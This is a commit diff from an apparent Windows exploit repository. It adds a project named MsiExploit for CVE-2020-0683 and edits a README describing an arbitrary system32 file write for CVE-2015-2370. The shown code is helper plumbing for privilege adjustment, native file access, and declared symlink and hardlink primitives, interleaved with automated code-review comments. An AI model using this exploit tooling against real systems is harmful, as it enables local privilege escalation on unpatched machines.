Add a number of numbers:doughnut:
Ascotbe committed Jun 27, 2021
1 parent a73adf5 commit d6100ba
Showing 59 changed files with 7,385 additions and 5 deletions.
2 changes: 1 addition & 1 deletion CVE-2015-2370/README.md
Expand Up @@ -27,7 +27,7 @@

- VS2019 Any CPU Release

x64/x86 Windows 7/8.1都可以利用成功,这个漏洞就是可以像任意文件目录写入文件,就比如说我在**c:\windows\system32\\**这个目录没有权限写入文件,但是我可以利用漏洞在这个文件写入文件
x64/x86 Windows 7/8.1都可以利用成功,这个漏洞就是可以像任意文件目录写入文件,就比如说我在**c:\windows\system32\\ **这个目录没有权限写入文件,但是我可以利用漏洞在这个文件写入文件

```
#把桌面的test.txt文件写入到System32文件夹中
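--- a/CVE-2020-0683/CVE-2020-0683/MsiExploit.sln
+++ b/CVE-2020-0683/CVE-2020-0683/MsiExploit.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.26730.8
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MsiExploit", "MsiExploit\MsiExploit.vcxproj", "{E75DCF6C-9B6D-49C8-96D7-0003C127B449}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Debug|x64 = Debug|x64
+Debug|x86 = Debug|x86
+Release|x64 = Release|x64
+Release|x86 = Release|x86
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.ActiveCfg = Debug|x64
+{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.Build.0 = Debug|x64
+{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.ActiveCfg = Debug|Win32
+{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.Build.0 = Debug|Win32
+{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.ActiveCfg = Release|x64
+{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.Build.0 = Release|x64
+{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.ActiveCfg = Release|Win32
+{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.Build.0 = Release|Win32
+EndGlobalSection
+GlobalSection(SolutionProperties) = preSolution
+HideSolutionNode = FALSE
+EndGlobalSection
+GlobalSection(ExtensibilityGlobals) = postSolution
+SolutionGuid = {AA32DEA9-85D3-447D-820E-C6ACA3AD0CBD}
+EndGlobalSection
+EndGlobal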
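--- a/CVE-2020-0683/CVE-2020-0683/MsiExploit/CommonUtils.cpp
+++ b/CVE-2020-0683/CVE-2020-0683/MsiExploit/CommonUtils.cpp
@@ -0,0 +1,204 @@
+// Copyright 2015 Google Inc. All Rights Reserved.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http ://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+#include "stdafx.h"
+#include "CommonUtils.h"
+#include <strsafe.h>
+#include "ntimports.h"
+
+void __stdcall my_puts(const char* str)
+{
+fwrite(str, 1, strlen(str), stdout);
+}
+
+static console_output _pout = my_puts;
+
+void DebugSetOutput(console_output pout)
+{
+_pout = pout;
+}
+
+void DebugPrintf(const char* lpFormat, ...)
+{
+CHAR buf[1024];
+va_list va;
+
+va_start(va, lpFormat);
+
+StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);
+
+_pout(buf);
+}
+
+std::wstring GetErrorMessage(DWORD dwError)
+{
+LPWSTR pBuffer = NULL;
+
+DWORD dwSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS |
+FORMAT_MESSAGE_ALLOCATE_BUFFER, 0, dwError, 0, (LPWSTR)&pBuffer, 32 * 1024, nullptr);
+
+if (dwSize > 0)
+{
+std::wstring ret = pBuffer;
+
+LocalFree(pBuffer);
+
+return ret;
+}
+else
+{
+printf("Error getting message %d\n", GetLastError());
+WCHAR buf[64];
+StringCchPrintf(buf, _countof(buf), L"%d", dwError);
+return buf;
+}
+}
+
+std::wstring GetErrorMessage()
+{
+return GetErrorMessage(GetLastError());
+}
+
+
+BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
+{
+TOKEN_PRIVILEGES tp;
+LUID luid;
+
+if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
+{
+return FALSE;
+}
+
+tp.PrivilegeCount = 1;
+tp.Privileges[0].Luid = luid;
+if (bEnablePrivilege)
+{
+tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+}
+else
+{
+tp.Privileges[0].Attributes = 0;
+}
+
+if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
+{
+return FALSE;
+}
+
+if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
+{
+return FALSE;
+}
+
+return TRUE;
+}
+
+DWORD NtStatusToDosError(NTSTATUS status)
+{
+DEFINE_NTDLL(RtlNtStatusToDosError);
+return fRtlNtStatusToDosError(status);
+}
+
+void SetNtLastError(NTSTATUS status)
+{
+SetLastError(NtStatusToDosError(status));
+}
+
+FARPROC GetProcAddressNT(LPCSTR lpName)
+{
+return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
+}
+
+HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options)
+{
+UNICODE_STRING name = { 0 };
+OBJECT_ATTRIBUTES obj_attr = { 0 };
+
+DEFINE_NTDLL(RtlInitUnicodeString);
+DEFINE_NTDLL(NtOpenFile);
+
+if (path)
+{
+fRtlInitUnicodeString(&name, path);
+InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);
+}
+else
+{
+InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr);
+}
+
+HANDLE h = nullptr;
+IO_STATUS_BLOCK io_status = { 0 };
+NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options);
+if (NT_SUCCESS(status))
+{
+return h;
+}
+else
+{
+SetNtLastError(status);
+return nullptr;
+}
+}
+
+std::wstring BuildFullPath(const std::wstring& path, bool native)
+{
+std::wstring ret;
+WCHAR buf[MAX_PATH];
+
+if (native)
+{
+ret = L"\\??\\";
+}
+
+if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0)
+{
+ret += buf;
+}
+else
+{
+ret += path;
+}
+
+return ret;
+}
+
+std::wstring GetFileName(const std::wstring& s) {
+
+char sep = '/';
+
+#ifdef _WIN32
+sep = '\\';
+#endif
+
+size_t i = s.rfind(sep, s.length());
+if (i != std::string::npos) {
+return(s.substr(i + 1, s.length() - i));
+}
+
+return(L"");
+}
+
+std::wstring GetDirectoryName(const std::wstring& filename) {
+
+std::wstring directory = L"";
+const size_t last_slash_idx = filename.rfind('\\');
+if (std::string::npos != last_slash_idx)
+{
+directory = filename.substr(0, last_slash_idx);
+}
+
+return directory;
+}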
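Review bot: BuildFullPath treats any non-zero return from GetFullPathName as success, but when the expanded path does not fit in MAX_PATH the call returns the required size and leaves `buf` unwritten, so the uninitialised stack buffer is appended to `ret`; capture the length and guard with `const DWORD len = GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr);` followed by `if (len > 0 && len < MAX_PATH)`. DebugPrintf calls va_start without the matching `va_end(va);` after StringCbVPrintfA. GetErrorMessage formats a DWORD with `%d` in both the printf and the StringCchPrintf fallback; `%u` matches the unsigned type. GetDirectoryName splits only on `'\\'` while GetFileName also accepts `'/'` when _WIN32 is not defined — presumably fine for a Windows-only file, but a one-line comment on GetDirectoryName stating that only backslash paths are expected would make the asymmetry deliberate.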
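--- a/CVE-2020-0683/CVE-2020-0683/MsiExploit/CommonUtils.h
+++ b/CVE-2020-0683/CVE-2020-0683/MsiExploit/CommonUtils.h
@@ -0,0 +1,25 @@
+#pragma once
+
+#include <Windows.h>
+#include <string>
+
+typedef void(__stdcall *console_output)(const char*);
+
+void DebugSetOutput(console_output pout);
+void DebugPrintf(const char* lpFormat, ...);
+HANDLE CreateSymlink(HANDLE root, LPCWSTR linkname, LPCWSTR targetname);
+HANDLE OpenSymlink(HANDLE root, LPCWSTR linkname);
+HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR dirname, HANDLE hShadow);
+HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR dirname);
+std::wstring GetErrorMessage(DWORD dwError);
+std::wstring GetErrorMessage();
+BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege);
+bool CreateRegSymlink(LPCWSTR lpSymlink, LPCWSTR lpTarget, bool bVolatile);
+bool DeleteRegSymlink(LPCWSTR lpSymlink);
+DWORD NtStatusToDosError(NTSTATUS status);
+bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname);
+bool CreateNativeHardlink(LPCWSTR targetname, HANDLE hFile);
+HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options);
+std::wstring BuildFullPath(const std::wstring& path, bool native);
+std::wstring GetFileName(const std::wstring& s);
+std::wstring GetDirectoryName(const std::wstring& filename);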
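Review bot: The header does not look self-contained: it includes only Windows.h and <string>, yet the NtStatusToDosError prototype uses NTSTATUS, which as far as I can tell Windows.h alone does not declare, so the header presumably compiles only because CommonUtils.cpp includes stdafx.h first. Either add `#include <winternl.h>` after Windows.h or state the dependency with a comment such as `// Requires the precompiled header (stdafx.h) for NTSTATUS.` The header also declares CreateSymlink, OpenSymlink, CreateObjectDirectory, OpenObjectDirectory, CreateRegSymlink, DeleteRegSymlink and both CreateNativeHardlink overloads, none of which CommonUtils.cpp in this commit defines; if they are implemented in other files of this change, a brief comment naming the defining translation unit would help readers locate them.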
